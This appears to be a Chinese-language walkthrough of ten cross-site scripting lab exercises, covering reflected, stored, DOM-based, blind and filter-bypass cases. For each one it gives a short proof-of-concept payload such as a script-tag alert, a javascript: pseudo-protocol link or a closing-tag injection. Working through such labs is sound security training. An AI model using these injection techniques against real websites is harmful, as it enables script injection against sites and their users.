1.反射型xss
输入框限制了输入长度,可以修改端代码
输入
<script>alert(/zk/)</script>
2.反射型xss
先进行登录(账户密码为admin 123456)
登录后输入
<script>alert(/zk/)</script>
3.存储型xss
直接在留言板输入
<script>alert(/zk/)</script>
4.DOM型xss
输入111,查看页面源码,发现会产生一个a标签的按钮,可以构造一个新闭合
使用伪协议
javascript:alert(/zk/)
5.DOM型xss-x
输入111测试
和上一题差不多,输入
javascript:alert(/zk/)
6.xss之盲打
类似于留言板,输入xss后去后台查看
7.xss之过滤
输入测试代码<sCr<ScRiPt>IPT>OonN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>
发现过滤了script,使用伪协议转码
<a href = javascript:alert(/zk/)> click me </a>
8.xss之htmlspecialchars
输入测试代码发现会产生一个链接,查看源代码是被传参到a href中
输入
javascript:alert(/zk/)
9.xss之href输出
传参到href,好之前的方法一样,使用伪协议
输入
javascript:alert(/zk/)
10.xss之js输出
查看源代码
输入
'</script><script>alert(/zk/)</script>